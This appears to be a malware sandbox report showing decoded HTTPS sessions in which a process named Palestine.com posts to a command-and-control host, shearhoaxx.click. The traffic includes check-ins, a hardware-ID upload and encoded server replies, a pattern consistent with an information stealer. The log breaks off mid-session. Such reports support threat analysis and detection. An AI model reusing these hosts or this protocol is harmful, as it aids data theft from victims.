                                                                                                                                                                                                                                            • slotwang.com
                                                                                                                                                                                                                                            • kliptedehoa.shop
                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.1649701172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:29 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2024-12-23 09:35:30 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=6t21rh5pc2deh8omfnn7m914uu; expires=Fri, 18 Apr 2025 03:22:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGD3y4Vh7zT71%2F3bo6EhCNG1jnxX9HXTxHnzjbOhHBAj0SicOhBRRO%2BE276adAPe9wAZO6ZndBIOHFU39MVwDntro7uAutqMwDIWu1bu83EOPMOoPG9pqXw7XFth8esABl41"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675ca59bc5430d-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1728&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1628555&cwnd=227&unsent_bytes=0&cid=8375f9a73042b486&ts=793&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2024-12-23 09:35:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.1649702172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:31 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:31 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=Dvh8ui--888&j=
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=hc3rglngaf9kua64ql75v5ugup; expires=Fri, 18 Apr 2025 03:22:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9uA%2BxZ8wQfQB9NBzmBQejWXdP1d1pC0qqkAEcfrNLBN2QesUcYvhsWGa51DurIwpgUx%2FQtUX%2FpDdkayhm%2FjmcJuQKWkE1kr39YOWEUURmJBjCHQ8gvTr6kY%2BLC67SaB0ukcR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675cb22eae425d-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1735&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=945&delivery_rate=1652518&cwnd=193&unsent_bytes=0&cid=b51c6f9d3623ea50&ts=773&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC244INData Raw: 34 39 31 63 0d 0a 59 6f 4f 67 4c 41 74 6f 70 51 68 4b 63 46 47 55 51 37 78 6d 36 33 6f 6a 54 4c 5a 49 48 68 6a 70 68 71 33 61 2f 71 73 6b 4e 6a 30 5a 6f 64 59 4f 4d 56 79 4a 4b 6a 6b 56 63 36 34 33 7a 68 4f 4f 56 67 45 74 30 6d 6f 6b 66 6f 6a 71 33 72 2f 53 69 56 4a 62 48 31 6a 6c 77 55 42 34 44 59 6b 71 4c 77 68 7a 72 68 6a 48 52 49 34 55 41 58 61 55 4c 58 52 36 69 4f 72 50 75 35 58 45 56 46 70 65 43 75 2f 48 52 47 34 4c 77 57 6b 6d 48 54 54 78 4a 74 30 4d 68 52 4e 4f 4a 4e 74 71 4d 6a 71 4d 2f 49 2f 67 33 4f 5a 42 51 6c 77 76 34 74 4e 48 4b 52 57 4a 63 32 67 56 50 37 5a 35 6e 67 65 4f 47 45 38 71 30 69 4e 32 63 49 48 69 7a 72 36 55 32 30 31 51 56 51 72 68 78 45 56 6b 41 74 56 6b 4c 42 6f 2f 39 79 7a 64 52 4d 64 59 52 6a
                                                                                                                                                                                                                                            Data Ascii: 491cYoOgLAtopQhKcFGUQ7xm63ojTLZIHhjphq3a/qskNj0ZodYOMVyJKjkVc643zhOOVgEt0mokfojq3r/SiVJbH1jlwUB4DYkqLwhzrhjHRI4UAXaULXR6iOrPu5XEVFpeCu/HRG4LwWkmHTTxJt0MhRNOJNtqMjqM/I/g3OZBQlwv4tNHKRWJc2gVP7Z5ngeOGE8q0iN2cIHizr6U201QVQrhxEVkAtVkLBo/9yzdRMdYRj
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 61 55 63 6a 77 70 75 65 66 65 71 59 6e 45 56 6c 49 66 48 36 2f 62 44 6d 34 47 68 7a 4a 6f 47 6a 2f 34 4a 4e 30 4c 6a 68 6c 42 50 4e 73 71 66 33 4b 44 34 4d 57 33 6b 38 5a 49 58 6c 67 49 36 4d 56 42 62 67 4c 42 5a 53 74 53 66 62 59 6d 78 6b 54 52 57 47 45 2b 31 79 6c 6f 64 35 71 6b 30 50 61 46 69 55 46 59 48 31 69 68 78 45 42 6f 42 38 64 34 49 42 6b 34 38 7a 50 56 44 59 51 56 51 53 50 65 4a 58 39 36 6a 4f 37 46 74 35 62 4e 53 31 6c 5a 41 4f 47 43 41 43 6b 4e 33 79 70 77 55 68 44 7a 4d 64 6b 49 6e 31 70 37 62 73 74 6b 5a 54 71 4d 36 49 2f 67 33 4d 46 44 56 31 77 4c 37 73 46 47 59 68 6a 48 65 43 34 66 4e 75 51 6e 32 77 71 44 47 31 4d 6b 32 69 78 2f 63 34 44 74 79 72 2b 59 69 51 67 55 57 42 69 68 6d 67 35 49 42 38 78 6d 49 67 55 7a 74 6a 36 51 48 63 6b 66 54
                                                                                                                                                                                                                                            Data Ascii: aUcjwpuefeqYnEVlIfH6/bDm4GhzJoGj/4JN0LjhlBPNsqf3KD4MW3k8ZIXlgI6MVBbgLBZStSfbYmxkTRWGE+1ylod5qk0PaFiUFYH1ihxEBoB8d4IBk48zPVDYQVQSPeJX96jO7Ft5bNS1lZAOGCACkN3ypwUhDzMdkIn1p7bstkZTqM6I/g3MFDV1wL7sFGYhjHeC4fNuQn2wqDG1Mk2ix/c4Dtyr+YiQgUWBihmg5IB8xmIgUztj6QHckfT
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 7a 64 34 65 6b 67 66 69 62 30 51 59 4d 48 79 72 69 31 6b 31 6a 53 50 4a 70 4a 68 77 30 34 47 48 42 53 70 42 59 52 69 4b 55 63 6a 78 33 69 75 7a 4a 71 70 50 45 52 56 70 52 44 2b 54 4e 52 6d 6b 4b 79 6d 38 73 47 54 6a 31 4c 4e 6f 57 67 78 68 4a 4b 39 55 67 64 6a 72 46 70 4d 69 67 33 4a 45 47 5a 55 67 4c 6f 2f 64 4e 5a 77 54 41 66 47 67 4e 66 65 39 68 32 51 6a 4a 51 41 45 6a 33 43 39 35 64 59 72 75 77 62 32 57 78 55 35 61 58 42 4c 75 78 6b 35 6c 41 73 31 6e 4a 68 59 37 2f 79 72 56 41 6f 6b 5a 53 32 36 61 61 6e 74 69 79 37 79 50 6a 4a 76 46 53 31 73 64 4e 65 4c 4d 51 47 34 63 68 33 56 6d 43 33 50 78 4c 5a 35 63 79 52 52 49 4c 74 38 67 65 48 71 4d 36 63 71 37 6d 38 70 4c 55 31 55 4f 35 73 5a 43 59 41 66 42 61 69 38 57 4e 75 51 6b 31 77 69 46 57 41 39 75 30 7a
                                                                                                                                                                                                                                            Data Ascii: zd4ekgfib0QYMHyri1k1jSPJpJhw04GHBSpBYRiKUcjx3iuzJqpPERVpRD+TNRmkKym8sGTj1LNoWgxhJK9UgdjrFpMig3JEGZUgLo/dNZwTAfGgNfe9h2QjJQAEj3C95dYruwb2WxU5aXBLuxk5lAs1nJhY7/yrVAokZS26aantiy7yPjJvFS1sdNeLMQG4ch3VmC3PxLZ5cyRRILt8geHqM6cq7m8pLU1UO5sZCYAfBai8WNuQk1wiFWA9u0z
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 70 4d 69 30 33 4a 45 47 58 56 59 53 37 38 78 48 5a 41 7a 50 62 53 59 66 4f 50 41 71 32 51 4f 50 46 55 6b 6a 30 53 6c 39 66 6f 48 32 7a 4c 4f 57 78 45 77 55 45 55 44 6d 32 67 34 78 53 75 42 6d 41 51 49 6f 35 44 65 65 47 38 63 42 41 53 6e 59 61 69 51 36 69 4f 76 47 74 35 54 42 53 56 74 62 44 75 66 45 51 32 77 46 7a 58 67 67 48 44 37 39 4c 74 55 57 69 52 56 46 49 74 41 69 64 33 44 4c 71 6f 2b 2f 68 49 6b 65 46 47 6f 4e 37 73 4a 4e 66 30 72 59 4a 44 46 53 4e 50 70 68 68 6b 53 46 46 6b 45 68 32 43 5a 33 63 6f 72 6f 77 62 2b 5a 77 45 35 63 54 51 48 6c 79 6b 39 6e 42 63 5a 75 4c 52 63 33 38 53 58 59 43 38 6c 57 41 53 6e 4d 61 69 51 36 70 4d 50 36 2b 72 33 7a 42 6b 73 52 47 61 48 46 51 69 6c 53 68 32 59 72 48 6a 76 35 4a 39 63 49 67 78 46 4b 49 74 38 75 63 48 4f
                                                                                                                                                                                                                                            Data Ascii: pMi03JEGXVYS78xHZAzPbSYfOPAq2QOPFUkj0Sl9foH2zLOWxEwUEUDm2g4xSuBmAQIo5DeeG8cBASnYaiQ6iOvGt5TBSVtbDufEQ2wFzXggHD79LtUWiRVFItAid3DLqo+/hIkeFGoN7sJNf0rYJDFSNPphhkSFFkEh2CZ3corowb+ZwE5cTQHlyk9nBcZuLRc38SXYC8lWASnMaiQ6pMP6+r3zBksRGaHFQilSh2YrHjv5J9cIgxFKIt8ucHO
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 5a 33 50 56 46 4e 57 45 75 2f 50 51 57 45 43 7a 6d 73 73 46 7a 37 77 4c 64 51 46 6a 68 5a 50 4a 70 52 6b 50 48 32 54 70 4a 66 34 76 64 6c 64 52 6b 6b 4e 77 4d 39 42 4b 52 57 4a 63 32 67 56 50 37 5a 35 6e 67 32 62 48 45 77 38 33 53 31 79 64 59 6a 32 7a 72 57 58 32 30 46 62 57 77 66 74 78 45 46 76 43 38 4a 67 4a 42 55 32 2f 53 37 53 52 4d 64 59 52 6a 61 55 63 6a 78 55 67 50 66 59 75 35 4c 43 55 45 38 66 48 36 2f 62 44 6d 34 47 68 7a 4a 6f 45 54 6a 39 4a 64 34 49 69 52 78 4d 4c 73 59 6c 65 33 32 43 37 39 32 79 6d 38 35 4e 58 46 51 50 35 39 42 43 5a 78 6a 43 65 44 70 53 66 62 59 6d 78 6b 54 52 57 48 63 70 78 44 70 2f 4f 4c 72 79 7a 4b 36 58 78 45 6f 55 51 45 37 34 67 6b 6c 6c 53 70 38 71 4c 68 30 36 39 53 37 66 44 59 55 56 52 43 66 52 4b 33 70 2b 67 65 37 50
                                                                                                                                                                                                                                            Data Ascii: Z3PVFNWEu/PQWECzmssFz7wLdQFjhZPJpRkPH2TpJf4vdldRkkNwM9BKRWJc2gVP7Z5ng2bHEw83S1ydYj2zrWX20FbWwftxEFvC8JgJBU2/S7SRMdYRjaUcjxUgPfYu5LCUE8fH6/bDm4GhzJoETj9Jd4IiRxMLsYle32C792ym85NXFQP59BCZxjCeDpSfbYmxkTRWHcpxDp/OLryzK6XxEoUQE74gkllSp8qLh069S7fDYUVRCfRK3p+ge7P
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 6b 61 52 6b 44 6d 7a 67 34 78 53 73 52 74 4b 78 4d 35 2f 79 33 52 41 34 30 4b 53 79 6e 47 4b 33 31 78 68 75 6a 50 74 5a 48 44 52 31 31 53 44 4f 7a 46 53 57 59 50 68 79 52 6f 46 53 75 32 65 5a 34 6c 68 42 4e 4e 64 59 35 71 59 7a 53 53 70 4d 69 30 33 4a 45 47 56 46 55 46 36 38 39 4e 5a 67 6e 56 61 79 34 41 4d 2f 73 72 7a 41 36 43 48 55 77 6a 32 53 6c 36 66 49 44 6f 33 62 47 63 79 6b 30 55 45 55 44 6d 32 67 34 78 53 75 52 39 50 68 67 30 2b 6a 66 56 42 59 6f 4f 54 44 36 55 5a 44 78 72 6a 50 57 50 34 49 72 5a 55 56 4e 41 54 76 69 43 53 57 56 4b 6e 79 6f 75 47 7a 58 78 4a 39 41 57 6a 42 35 4f 49 64 30 6a 65 48 4b 49 35 4d 75 38 6d 38 78 46 57 46 51 48 34 73 31 4b 59 41 54 4f 5a 57 68 63 63 2f 45 35 6e 6c 7a 4a 4f 56 6f 74 32 43 63 38 5a 63 58 39 6a 37 2b 51 69
                                                                                                                                                                                                                                            Data Ascii: kaRkDmzg4xSsRtKxM5/y3RA40KSynGK31xhujPtZHDR11SDOzFSWYPhyRoFSu2eZ4lhBNNdY5qYzSSpMi03JEGVFUF689NZgnVay4AM/srzA6CHUwj2Sl6fIDo3bGcyk0UEUDm2g4xSuR9Phg0+jfVBYoOTD6UZDxrjPWP4IrZUVNATviCSWVKnyouGzXxJ9AWjB5OId0jeHKI5Mu8m8xFWFQH4s1KYATOZWhcc/E5nlzJOVot2Cc8ZcX9j7+Qi
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 59 6f 65 4a 46 66 77 2f 41 66 47 6f 6e 4d 50 67 76 32 52 4c 4a 42 33 35 67 6c 43 56 6d 4f 74 50 64 31 76 69 62 78 51 59 4d 48 78 58 6d 77 6b 6c 7a 48 4d 42 6d 4f 52 6b 2b 2b 67 50 52 41 35 38 62 54 69 33 46 49 7a 42 78 68 71 53 42 2b 4a 76 52 42 67 77 66 4c 2b 62 55 54 55 59 4a 31 6d 4e 6f 58 48 50 78 4e 35 35 63 79 53 59 42 50 4e 63 36 66 33 57 61 32 6f 2f 67 68 66 63 47 58 30 6b 48 38 63 46 59 59 67 66 4c 65 78 5a 53 61 36 4a 7a 6a 46 62 62 53 6c 35 75 79 78 55 79 4f 6f 71 6b 6c 34 47 46 69 56 41 55 42 31 4b 76 67 6c 77 70 55 6f 63 74 4b 77 41 68 38 43 4c 49 42 38 34 6d 66 77 6e 43 49 48 74 71 6a 50 50 41 2b 4e 4b 4a 53 52 51 48 4f 61 48 4c 53 58 49 62 30 57 63 34 46 58 50 4a 62 35 34 63 79 55 41 42 47 39 63 6b 63 6e 32 64 39 59 4b 66 69 73 4e 42 52 46
                                                                                                                                                                                                                                            Data Ascii: YoeJFfw/AfGonMPgv2RLJB35glCVmOtPd1vibxQYMHxXmwklzHMBmORk++gPRA58bTi3FIzBxhqSB+JvRBgwfL+bUTUYJ1mNoXHPxN55cySYBPNc6f3Wa2o/ghfcGX0kH8cFYYgfLexZSa6JzjFbbSl5uyxUyOoqkl4GFiVAUB1KvglwpUoctKwAh8CLIB84mfwnCIHtqjPPA+NKJSRQHOaHLSXIb0Wc4FXPJb54cyUABG9ckcn2d9YKfisNBRF
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 51 53 55 45 7a 47 6f 76 41 69 58 74 62 64 59 48 6b 77 4a 2f 45 50 38 6d 65 6e 32 52 34 38 6d 65 76 49 6b 49 46 46 42 41 75 66 73 4f 49 55 72 34 4a 47 67 4b 63 36 35 68 36 77 65 48 46 6b 59 34 78 57 64 55 57 62 48 65 6a 5a 53 62 33 41 52 67 57 42 44 77 79 55 4e 6c 53 6f 6b 71 4c 6c 4a 72 70 6d 2b 65 41 4a 68 59 47 58 36 47 63 53 6b 70 33 4c 53 64 70 39 4c 51 42 6b 49 66 57 4c 4f 4d 44 6e 74 4b 6e 79 70 76 45 53 48 6b 4a 39 30 53 69 6c 39 2f 45 50 4d 6b 65 33 75 64 39 4e 69 33 6f 76 64 54 56 31 45 4f 35 74 52 66 4b 55 53 48 5a 57 68 4b 43 72 5a 70 6e 6a 76 48 57 46 6c 75 6a 47 70 4a 65 59 58 71 79 4b 36 4e 68 47 46 61 57 41 48 33 30 6c 6c 6d 53 6f 6b 71 4c 6c 4a 72 70 47 2b 65 41 4a 68 59 47 58 36 47 63 53 6b 70 33 4c 53 64 70 39 4c 51 42 6b 49 66 57 4c 4f
                                                                                                                                                                                                                                            Data Ascii: QSUEzGovAiXtbdYHkwJ/EP8men2R48mevIkIFFBAufsOIUr4JGgKc65h6weHFkY4xWdUWbHejZSb3ARgWBDwyUNlSokqLlJrpm+eAJhYGX6GcSkp3LSdp9LQBkIfWLOMDntKnypvESHkJ90Sil9/EPMke3ud9Ni3ovdTV1EO5tRfKUSHZWhKCrZpnjvHWFlujGpJeYXqyK6NhGFaWAH30llmSokqLlJrpG+eAJhYGX6GcSkp3LSdp9LQBkIfWLO
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 59 56 4b 4c 77 51 77 74 6d 2b 65 43 4d 6c 41 41 53 2f 65 4f 6e 46 31 6a 4b 6a 49 6f 70 75 4a 43 42 52 52 51 4c 6d 43 54 32 4d 61 79 6d 55 76 58 6a 58 34 4c 35 34 62 78 77 45 42 4f 4a 52 79 4c 7a 54 4c 39 6f 2f 67 33 49 35 46 52 6b 30 47 34 74 52 4e 4c 6a 54 35 52 7a 6f 56 49 2f 56 6a 37 77 6d 4e 44 6c 51 74 78 43 31 43 52 4b 62 32 79 4b 69 66 69 33 64 43 58 41 44 76 78 51 34 6e 53 74 38 71 63 46 49 65 35 43 62 4f 42 38 6c 57 41 53 4b 55 63 6a 78 33 6d 65 50 66 75 39 44 4f 58 46 4d 66 48 36 2f 62 44 6e 39 4b 6e 7a 6c 6d 55 69 47 32 65 5a 35 44 68 78 56 41 4c 64 6f 70 62 6d 69 4e 35 39 6d 37 32 2f 64 34 65 55 30 48 38 63 45 4d 57 41 66 44 66 44 30 52 49 2f 45 66 34 43 6d 62 48 31 45 74 6c 67 5a 37 64 34 66 61 38 59 2b 4e 7a 6c 59 57 65 51 50 33 77 51 34 6e
                                                                                                                                                                                                                                            Data Ascii: YVKLwQwtm+eCMlAAS/eOnF1jKjIopuJCBRRQLmCT2MaymUvXjX4L54bxwEBOJRyLzTL9o/g3I5FRk0G4tRNLjT5RzoVI/Vj7wmNDlQtxC1CRKb2yKifi3dCXADvxQ4nSt8qcFIe5CbOB8lWASKUcjx3mePfu9DOXFMfH6/bDn9KnzlmUiG2eZ5DhxVALdopbmiN59m72/d4eU0H8cEMWAfDfD0RI/Ef4CmbH1EtlgZ7d4fa8Y+NzlYWeQP3wQ4n


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.1649703172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:34 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=0XCM0IN6W00VK5
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12818
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:34 UTC12818OUTData Raw: 2d 2d 30 58 43 4d 30 49 4e 36 57 30 30 56 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 30 58 43 4d 30 49 4e 36 57 30 30 56 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 58 43 4d 30 49 4e 36 57 30 30 56 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 30 58 43 4d 30 49 4e 36 57 30
                                                                                                                                                                                                                                            Data Ascii: --0XCM0IN6W00VK5Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--0XCM0IN6W00VK5Content-Disposition: form-data; name="pid"2--0XCM0IN6W00VK5Content-Disposition: form-data; name="lid"Dvh8ui--888--0XCM0IN6W0
                                                                                                                                                                                                                                            2024-12-23 09:35:35 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=u0u852h6m2gfecqvrhe7rqb16s; expires=Fri, 18 Apr 2025 03:22:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=siM1kNoY44WglEhZj9Y9K%2FPHBwQ0aES7TGXPReD%2F6aGHhvla8eoj1mvmcodyo6g4bgxTpIevNo6HdS8I%2BlxESKwlm1dOUGeBMtz34m93KITKI5u7z%2B2qsjmBXNqmVQ5Y5Qzy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675cc10e8a8cdd-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1793&rtt_var=702&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=13754&delivery_rate=1526398&cwnd=162&unsent_bytes=0&cid=eedd6f19d3c418d7&ts=887&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:35:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.1649704172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:36 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=KQ705QDAAMD4KJNE
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15065
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:36 UTC15065OUTData Raw: 2d 2d 4b 51 37 30 35 51 44 41 41 4d 44 34 4b 4a 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 4b 51 37 30 35 51 44 41 41 4d 44 34 4b 4a 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 51 37 30 35 51 44 41 41 4d 44 34 4b 4a 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 4b 51 37 30
                                                                                                                                                                                                                                            Data Ascii: --KQ705QDAAMD4KJNEContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--KQ705QDAAMD4KJNEContent-Disposition: form-data; name="pid"2--KQ705QDAAMD4KJNEContent-Disposition: form-data; name="lid"Dvh8ui--888--KQ70
                                                                                                                                                                                                                                            2024-12-23 09:35:37 UTC1138INHTTP/1.1 200 OK
